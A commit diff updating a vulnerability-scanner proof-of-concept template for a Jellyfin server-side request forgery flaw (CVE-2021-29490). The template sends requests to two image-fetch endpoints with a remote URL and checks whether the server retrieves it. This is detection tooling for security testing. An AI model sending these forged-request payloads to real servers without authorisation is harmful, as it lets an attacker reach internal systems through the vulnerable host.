Update jellyfin-cve-2021-29490.yml (#1632)

Author: Jarcis-cy

pocs/jellyfin-cve-2021-29490.yml

@@ -2,15 +2,22 @@ name: poc-yaml-jellyfin-cve-2021-29490
 manual: true
 transport: http
 rules:
-    r0:
-        request:
-            cache: true
-            method: GET
-            path: /Images/Remote?imageUrl=http://baidu.com
-            follow_redirects: true
-        expression: response.status == 200 && response.body.bcontains(bytes("baidu.com"))
-expression: r0()
+  r0:
+    request:
+      cache: true
+      method: GET
+      path: /Images/Remote?imageUrl=http://example.com/
+      follow_redirects: true
+    expression: response.status == 200 && response.body.bcontains(bytes("This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission."))
+  r1:
+    request:
+      cache: true
+      method: GET
+      path: /Items/RemoteSearch/Image?ImageUrl=http://example.com&ProviderName=TheMovieDB
+      follow_redirects: true
+    expression: response.status == 200 && response.body.bcontains(bytes("This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission."))
+expression: r0() || r1()
 detail:
-    author: 曦shen
-    links:
-        - https://mp.weixin.qq.com/s/lZcjStsMKz-VeP-KjU2H7g
+  author: jarcis-cy(https://github.com/jarcis-cy)
+  links:
+    - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96